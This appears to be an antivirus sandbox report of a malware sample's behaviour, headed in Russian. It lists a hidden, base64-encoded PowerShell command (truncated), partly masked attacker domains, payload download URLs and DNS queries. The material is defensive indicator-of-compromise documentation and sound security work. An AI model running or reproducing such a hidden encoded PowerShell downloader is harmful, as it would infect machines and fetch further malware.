Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABPAG0AaQByAHYAbwBtAHAAcABjAGwAYQBpAD0AJwBQAGwAdQBqAGEAbQBqAGoAeQBqAHAAJwA7ACQASQBjAHkAeABvAHAAZgBpAHoAZgBrAHoAYwAgAD0AIAAnADEANwA2ACcAOwAkAEcAdwBpAG0AawBmAHgAbwA9ACcASgB2AG4AagB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1142223.cvr
- 'vi##sa.com':80
- 'sn####lthmedico.com':443
- 'co###izate.com':80
- 'co###izate.com':443
- 'my##ol.biz':443
- http://vi##sa.com/administrator/OMM4w/
- http://co###izate.com/Sitio_web/8PzLe0/
- 'sn####lthmedico.com':443
- 'co###izate.com':443
- 'my##ol.biz':443
- DNS ASK de##.#oolatech.com
- DNS ASK vi##sa.com
- DNS ASK sn####lthmedico.com
- DNS ASK co###izate.com
- DNS ASK my##ol.biz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABPAG0AaQByAHYAbwBtAHAAcABjAGwAYQBpAD0AJwBQAGwAdQBqAGEAbQBqAGoAeQBqAHAAJwA7ACQASQBjAHkAeABvAHAAZgBpAHoAZgBrAHoAYwAgAD0AIAAnADEANwA2ACcAOwAkAEcAdwBpAG0AawBmAHgAbwA9ACcASgB2AG4AagB...' (со скрытым окном)